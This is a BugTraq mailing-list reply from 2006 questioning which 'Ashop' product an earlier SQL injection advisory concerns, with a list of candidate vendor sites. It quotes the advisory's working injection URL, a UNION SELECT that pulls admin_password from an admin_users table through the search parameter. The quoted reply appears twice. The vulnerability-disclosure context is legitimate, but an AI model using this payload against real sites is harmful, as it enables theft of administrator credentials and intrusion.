BugTraq
Back to list
|
Post reply
Ashop Search Module SQL injection
Jun 13 2006 04:48PM
entrika_fs yahoo com
(1 replies)
Re: Ashop Search Module SQL injection
Jul 25 2006 10:35PM
security curmudgeon (jericho attrition org)
On Tue, 13 Jun 2006, entrika_fs (at) yahoo (dot) com [email concealed] wrote:
: http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2C
admin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Shopping Cart Software
www.ashop.com.au/
ASHOP
www.ashop.com.hk/
Ashop
www.ashop.co.il/
Ashop
www.ashop.at/
ashop.co.uk
www.ashop.co.uk/
[..]
Something else?
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
On Tue, 13 Jun 2006, entrika_fs (at) yahoo (dot) com [email concealed] wrote:
: http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2C
admin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Shopping Cart Software
www.ashop.com.au/
ASHOP
www.ashop.com.hk/
Ashop
www.ashop.co.il/
Ashop
www.ashop.at/
ashop.co.uk
www.ashop.co.uk/
[..]
Something else?
[ reply ]